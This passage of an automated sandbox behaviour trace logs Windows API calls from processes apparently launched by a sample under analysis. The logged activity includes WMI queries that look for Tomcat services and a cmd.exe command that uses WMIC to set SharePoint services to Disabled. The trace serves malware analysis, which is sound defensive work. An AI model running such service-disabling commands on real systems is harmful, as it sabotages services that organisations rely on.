wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0120.677] IWbemQualifierSet:Get (in: This=0xd4f4d0, wszName="write", lFlags=0, pVal=0x91f62c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x91f62c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0120.677] IWbemQualifierSet:Get (in: This=0xd4f4d0, wszName="Description", lFlags=0, pVal=0x91f604*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x91f604*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0120.677] lstrlenA (lpString="Not Available") returned 13 [0120.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301d64, cbMultiByte=-1, lpWideCharStr=0xcd9290, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0120.678] IUnknown:Release (This=0xd4f4d0) returned 0x0 [0120.678] lstrlenW (lpString="StartMode") returned 9 [0120.678] lstrlenW (lpString="StartMode") returned 9 [0120.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="StartMode", cchCount1=9, lpString2="StartMode", cchCount2=9) returned 2 [0120.678] SysStringLen (param_1="In") returned 0x2 [0120.678] SysStringLen (param_1="MaxLen") returned 0x6 [0120.678] SysStringLen (param_1="ValueMap") returned 0x8 [0120.678] SysStringLen (param_1="MaxLen") returned 0x6 [0120.678] SysStringLen (param_1="MaxLen") returned 0x6 [0120.678] SysStringLen (param_1="ValueMap") returned 0x8 [0120.678] lstrlenW (lpString="") returned 0 [0120.678] lstrlenW (lpString="STRING") returned 6 [0120.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0120.678] lstrlenW (lpString="string") returned 6 [0120.678] lstrlenW (lpString="STRING") returned 6 [0120.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0120.678] SysStringLen (param_1="In") returned 0x2 [0120.678] SysStringLen (param_1="ValueMap") returned 0x8 [0120.678] SysStringLen (param_1="ValueMap") returned 0x8 [0120.678] SysStringLen (param_1="ValueMap") returned 0x8 [0120.678] SysStringLen (param_1="ValueMap") returned 0x8 [0120.678] SysStringLen (param_1="ValueMap") returned 0x8 [0120.678] lstrlenW (lpString="Boot") returned 4 [0120.678] lstrlenW (lpString="Disabled") returned 8 [0120.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Boot", cchCount2=4) returned 3 [0120.678] lstrlenW (lpString="System") returned 6 [0120.678] lstrlenW (lpString="Disabled") returned 8 [0120.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="System", cchCount2=6) returned 1 [0120.678] lstrlenW (lpString="Automatic") returned 9 [0120.678] lstrlenW (lpString="Disabled") returned 8 [0120.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Automatic", cchCount2=9) returned 3 [0120.678] lstrlenW (lpString="Manual") returned 6 [0120.678] lstrlenW (lpString="Disabled") returned 8 [0120.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Manual", cchCount2=6) returned 1 [0120.678] lstrlenW (lpString="Disabled") returned 8 [0120.678] lstrlenW (lpString="Disabled") returned 8 [0120.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Disabled", cchCount2=8) returned 2 [0120.679] IWbemClassObject:GetPropertyQualifierSet (in: This=0xd72d10, wszProperty="StartMode", ppQualSet=0x91f64c | out: ppQualSet=0x91f64c*=0xd4f108) returned 0x0 [0120.679] IWbemQualifierSet:Get (in: This=0xd4f108, wszName="CIMTYPE", lFlags=0, pVal=0x91f630*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x91f630*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="string", varVal2=0x0), plFlavor=0x0) returned 0x0 [0120.679] IWbemClassObject:Get (in: This=0xd72d10, wszName="StartMode", lFlags=0, pVal=0x91f620*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x91f640*=9565120, plFlavor=0x0 | out: pVal=0x91f620*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Automatic", varVal2=0x0), pType=0x91f640*=8, plFlavor=0x0) returned 0x0 [0120.679] IUnknown:Release (This=0xd4f108) returned 0x0 [0120.679] lstrlenW (lpString="string") returned 6 [0120.679] lstrlenW (lpString="string") returned 6 [0120.679] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="string", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0120.679] IWbemClassObject:Put (This=0xd72d10, wszName="StartMode", lFlags=0, pVal=0x91f6e4*(varType=0x8, wReserved1=0x0, wReserved2=0xf624, wReserved3=0x91, varVal1="Disabled", varVal2=0xd25df0), Type=0) returned 0x0 [0120.679] IUnknown:Release (This=0xd9cc20) returned 0x0 [0120.679] IUnknown:Release (This=0xd72b18) returned 0x0 [0120.679] IUnknown:Release (This=0xd9c730) returned 0x0 [0120.680] ??0CHString@@QAE@XZ () returned 0x91f630 [0120.680] GetCurrentThreadId () returned 0xc4c [0120.680] lstrlenA (lpString="") returned 0 [0120.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xcd9c48, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0120.680] lstrlenA (lpString="") returned 0 [0120.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xcd9c48, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0120.680] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0120.680] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0120.680] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x37ef91f7 | out: _String="Select", _Context=0x37ef91f7) returned="Select" [0120.681] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x37ef91f7 | out: _String=0x0, _Context=0x37ef91f7) returned="*" [0120.681] lstrlenW (lpString="FROM") returned 4 [0120.681] lstrlenW (lpString="*") returned 1 [0120.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0120.681] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x37ef91f7 | out: _String=0x0, _Context=0x37ef91f7) returned="from" [0120.681] lstrlenW (lpString="FROM") returned 4 [0120.681] lstrlenW (lpString="from") returned 4 [0120.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0120.681] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x37ef91f7 | out: _String=0x0, _Context=0x37ef91f7) returned="Win32_Service" [0120.682] lstrlenA (lpString="SELECT * FROM ") returned 14 [0120.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130431c, cbMultiByte=-1, lpWideCharStr=0xcd9c48, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0120.682] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0120.682] SysStringLen (param_1="Win32_Service") returned 0xd [0120.682] lstrlenA (lpString=" WHERE ") returned 7 [0120.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0xcd8f58, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0120.682] SysStringLen (param_1=" WHERE ") returned 0x7 [0120.682] SysStringLen (param_1="caption LIKE '%tomcat%'") returned 0x17 [0120.682] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0120.682] SysStringLen (param_1=" WHERE caption LIKE '%tomcat%'") returned 0x1e [0120.682] IWbemServices:ExecQuery (in: This=0xd40c80, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%tomcat%'", lFlags=48, pCtx=0x0, ppEnum=0x91f638 | out: ppEnum=0x91f638*=0xd72ca0) returned 0x0 [0120.690] CoSetProxyBlanket (pProxy=0xd72ca0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0120.737] IEnumWbemClassObject:Next (in: This=0xd72ca0, lTimeout=-1, uCount=0x1, apObjects=0x91f63c, puReturned=0x91f628 | out: apObjects=0x91f63c*=0x0, puReturned=0x91f628*=0x0) returned 0x1 [0121.148] IUnknown:Release (This=0xd72ca0) returned 0x0 [0121.149] ??1CHString@@QAE@XZ () returned 0x74a66430 [0121.149] ??1CHString@@QAE@XZ () returned 0x74a66430 [0121.149] GetCurrentThreadId () returned 0xc4c [0121.149] ??0CHString@@QAE@PBG@Z () returned 0x91f7f4 [0121.149] ??YCHString@@QAEABV0@PBG@Z () returned 0x91f7f4 [0121.149] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0xcda0d0, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0121.149] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0121.149] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0xcd9c48, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0121.149] __iob_func () returned 0x77ac1208 [0121.149] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 27 [0121.150] __iob_func () returned 0x77ac1208 [0121.150] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0121.150] ??1CHString@@QAE@XZ () returned 0x1 [0121.150] IUnknown:Release (This=0xd40c80) returned 0x0 [0121.151] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0121.151] _kbhit () returned 0x0 [0121.152] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0121.152] WbemLocator:IUnknown:Release (This=0xd174f8) returned 0x2 [0121.152] IUnknown:Release (This=0xd40640) returned 0x0 [0121.152] IUnknown:Release (This=0xd40a50) returned 0x0 [0121.153] WbemLocator:IUnknown:Release (This=0xd174f8) returned 0x1 [0121.153] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0121.153] WbemLocator:IUnknown:Release (This=0xd174f8) returned 0x0 [0121.154] CoUninitialize () [0121.168] exit (_Code=0) [0121.168] ??1CHString@@QAE@XZ () returned 0x74a66430 [0121.168] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 313 os_tid = 0xc60 Thread: id = 314 os_tid = 0xc5c Thread: id = 315 os_tid = 0xc40 Thread: id = 316 os_tid = 0xc30 Process: id = "73" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3edb2000" os_pid = "0xc44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4769 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 4770 start_va = 0xd70000 end_va = 0x4d6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d70000" filename = "" Region: id = 4771 start_va = 0x4d70000 end_va = 0x4d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d70000" filename = "" Region: id = 4772 start_va = 0x4d90000 end_va = 0x4d91fff entry_point = 0x0 region_type = private name = "private_0x0000000004d90000" filename = "" Region: id = 4773 start_va = 0x4da0000 end_va = 0x4db3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004da0000" filename = "" Region: id = 4774 start_va = 0x4dc0000 end_va = 0x4dfffff entry_point = 0x0 region_type = private name = "private_0x0000000004dc0000" filename = "" Region: id = 4775 start_va = 0x4e00000 end_va = 0x4efffff entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 4776 start_va = 0x4f00000 end_va = 0x4f03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f00000" filename = "" Region: id = 4777 start_va = 0x4f10000 end_va = 0x4f10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f10000" filename = "" Region: id = 4778 start_va = 0x4f20000 end_va = 0x4f21fff entry_point = 0x0 region_type = private name = "private_0x0000000004f20000" filename = "" Region: id = 4779 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4780 start_va = 0x7f7f0000 end_va = 0x7f812fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f7f0000" filename = "" Region: id = 4781 start_va = 0x7f81b000 end_va = 0x7f81dfff entry_point = 0x0 region_type = private name = "private_0x000000007f81b000" filename = "" Region: id = 4782 start_va = 0x7f81e000 end_va = 0x7f81efff entry_point = 0x0 region_type = private name = "private_0x000000007f81e000" filename = "" Region: id = 4783 start_va = 0x7f81f000 end_va = 0x7f81ffff entry_point = 0x0 region_type = private name = "private_0x000000007f81f000" filename = "" Region: id = 4784 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4785 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4786 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 4787 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4788 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 4789 start_va = 0x50f0000 end_va = 0x50fffff entry_point = 0x0 region_type = private name = "private_0x00000000050f0000" filename = "" Region: id = 4790 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4791 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4792 start_va = 0x5260000 end_va = 0x535ffff entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 4793 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4834 start_va = 0x4d70000 end_va = 0x4d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d70000" filename = "" Region: id = 4835 start_va = 0x4f30000 end_va = 0x4fedfff entry_point = 0x4f30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4836 start_va = 0x4ff0000 end_va = 0x502ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ff0000" filename = "" Region: id = 4837 start_va = 0x5100000 end_va = 0x51fffff entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 4838 start_va = 0x5460000 end_va = 0x546ffff entry_point = 0x0 region_type = private name = "private_0x0000000005460000" filename = "" Region: id = 4839 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4840 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4841 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4842 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 4843 start_va = 0x7f818000 end_va = 0x7f81afff entry_point = 0x0 region_type = private name = "private_0x000000007f818000" filename = "" Region: id = 4844 start_va = 0x4d80000 end_va = 0x4d83fff entry_point = 0x0 region_type = private name = "private_0x0000000004d80000" filename = "" Region: id = 4845 start_va = 0x4d90000 end_va = 0x4d93fff entry_point = 0x0 region_type = private name = "private_0x0000000004d90000" filename = "" Region: id = 4846 start_va = 0x5470000 end_va = 0x57a6fff entry_point = 0x5470000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 317 os_tid = 0x554 [0121.331] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0121.331] __set_app_type (_Type=0x1) [0121.331] __p__fmode () returned 0x77ac4d6c [0121.331] __p__commode () returned 0x77ac5b1c [0121.331] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0121.331] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0121.332] GetCurrentThreadId () returned 0x554 [0121.332] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x554) returned 0x84 [0121.332] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0121.332] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0121.332] SetThreadUILanguage (LangId=0x0) returned 0x409 [0121.334] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0121.334] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4effcb0 | out: phkResult=0x4effcb0*=0x0) returned 0x2 [0121.334] VirtualQuery (in: lpAddress=0x4effcb7, lpBuffer=0x4effc68, dwLength=0x1c | out: lpBuffer=0x4effc68*(BaseAddress=0x4eff000, AllocationBase=0x4e00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0121.334] VirtualQuery (in: lpAddress=0x4e00000, lpBuffer=0x4effc68, dwLength=0x1c | out: lpBuffer=0x4effc68*(BaseAddress=0x4e00000, AllocationBase=0x4e00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0121.334] VirtualQuery (in: lpAddress=0x4e01000, lpBuffer=0x4effc68, dwLength=0x1c | out: lpBuffer=0x4effc68*(BaseAddress=0x4e01000, AllocationBase=0x4e00000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0121.334] VirtualQuery (in: lpAddress=0x4e03000, lpBuffer=0x4effc68, dwLength=0x1c | out: lpBuffer=0x4effc68*(BaseAddress=0x4e03000, AllocationBase=0x4e00000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0121.334] VirtualQuery (in: lpAddress=0x4f00000, lpBuffer=0x4effc68, dwLength=0x1c | out: lpBuffer=0x4effc68*(BaseAddress=0x4f00000, AllocationBase=0x4f00000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0121.334] GetConsoleOutputCP () returned 0x1b5 [0121.335] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0121.335] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0121.335] _get_osfhandle (_FileHandle=1) returned 0x3c [0121.335] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0121.335] _get_osfhandle (_FileHandle=1) returned 0x3c [0121.335] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0121.335] _get_osfhandle (_FileHandle=1) returned 0x3c [0121.335] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0121.335] _get_osfhandle (_FileHandle=0) returned 0x38 [0121.335] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0121.335] _get_osfhandle (_FileHandle=0) returned 0x38 [0121.335] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0121.336] GetEnvironmentStringsW () returned 0x5267e10* [0121.336] FreeEnvironmentStringsA (penv="A") returned 1 [0121.336] GetEnvironmentStringsW () returned 0x5267e10* [0121.336] FreeEnvironmentStringsA (penv="A") returned 1 [0121.336] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4efec14 | out: phkResult=0x4efec14*=0x94) returned 0x0 [0121.336] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4efec18, lpData=0x4efec20, lpcbData=0x4efec1c*=0x1000 | out: lpType=0x4efec18*=0x0, lpData=0x4efec20*=0x60, lpcbData=0x4efec1c*=0x1000) returned 0x2 [0121.336] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4efec18, lpData=0x4efec20, lpcbData=0x4efec1c*=0x1000 | out: lpType=0x4efec18*=0x4, lpData=0x4efec20*=0x1, lpcbData=0x4efec1c*=0x4) returned 0x0 [0121.336] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4efec18, lpData=0x4efec20, lpcbData=0x4efec1c*=0x1000 | out: lpType=0x4efec18*=0x0, lpData=0x4efec20*=0x1, lpcbData=0x4efec1c*=0x1000) returned 0x2 [0121.336] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4efec18, lpData=0x4efec20, lpcbData=0x4efec1c*=0x1000 | out: lpType=0x4efec18*=0x4, lpData=0x4efec20*=0x0, lpcbData=0x4efec1c*=0x4) returned 0x0 [0121.336] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4efec18, lpData=0x4efec20, lpcbData=0x4efec1c*=0x1000 | out: lpType=0x4efec18*=0x4, lpData=0x4efec20*=0x40, lpcbData=0x4efec1c*=0x4) returned 0x0 [0121.336] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4efec18, lpData=0x4efec20, lpcbData=0x4efec1c*=0x1000 | out: lpType=0x4efec18*=0x4, lpData=0x4efec20*=0x40, lpcbData=0x4efec1c*=0x4) returned 0x0 [0121.336] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4efec18, lpData=0x4efec20, lpcbData=0x4efec1c*=0x1000 | out: lpType=0x4efec18*=0x0, lpData=0x4efec20*=0x40, lpcbData=0x4efec1c*=0x1000) returned 0x2 [0121.336] RegCloseKey (hKey=0x94) returned 0x0 [0121.336] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4efec14 | out: phkResult=0x4efec14*=0x94) returned 0x0 [0121.336] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4efec18, lpData=0x4efec20, lpcbData=0x4efec1c*=0x1000 | out: lpType=0x4efec18*=0x0, lpData=0x4efec20*=0x40, lpcbData=0x4efec1c*=0x1000) returned 0x2 [0121.336] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4efec18, lpData=0x4efec20, lpcbData=0x4efec1c*=0x1000 | out: lpType=0x4efec18*=0x4, lpData=0x4efec20*=0x1, lpcbData=0x4efec1c*=0x4) returned 0x0 [0121.336] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4efec18, lpData=0x4efec20, lpcbData=0x4efec1c*=0x1000 | out: lpType=0x4efec18*=0x0, lpData=0x4efec20*=0x1, lpcbData=0x4efec1c*=0x1000) returned 0x2 [0121.336] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4efec18, lpData=0x4efec20, lpcbData=0x4efec1c*=0x1000 | out: lpType=0x4efec18*=0x4, lpData=0x4efec20*=0x0, lpcbData=0x4efec1c*=0x4) returned 0x0 [0121.336] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4efec18, lpData=0x4efec20, lpcbData=0x4efec1c*=0x1000 | out: lpType=0x4efec18*=0x4, lpData=0x4efec20*=0x9, lpcbData=0x4efec1c*=0x4) returned 0x0 [0121.336] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4efec18, lpData=0x4efec20, lpcbData=0x4efec1c*=0x1000 | out: lpType=0x4efec18*=0x4, lpData=0x4efec20*=0x9, lpcbData=0x4efec1c*=0x4) returned 0x0 [0121.337] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4efec18, lpData=0x4efec20, lpcbData=0x4efec1c*=0x1000 | out: lpType=0x4efec18*=0x0, lpData=0x4efec20*=0x9, lpcbData=0x4efec1c*=0x1000) returned 0x2 [0121.337] RegCloseKey (hKey=0x94) returned 0x0 [0121.337] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2982a [0121.337] srand (_Seed=0x5ad2982a) [0121.337] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'" [0121.337] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'" [0121.337] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0121.337] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5269d68, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0121.337] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0121.337] GetEnvironmentVariableW (in: 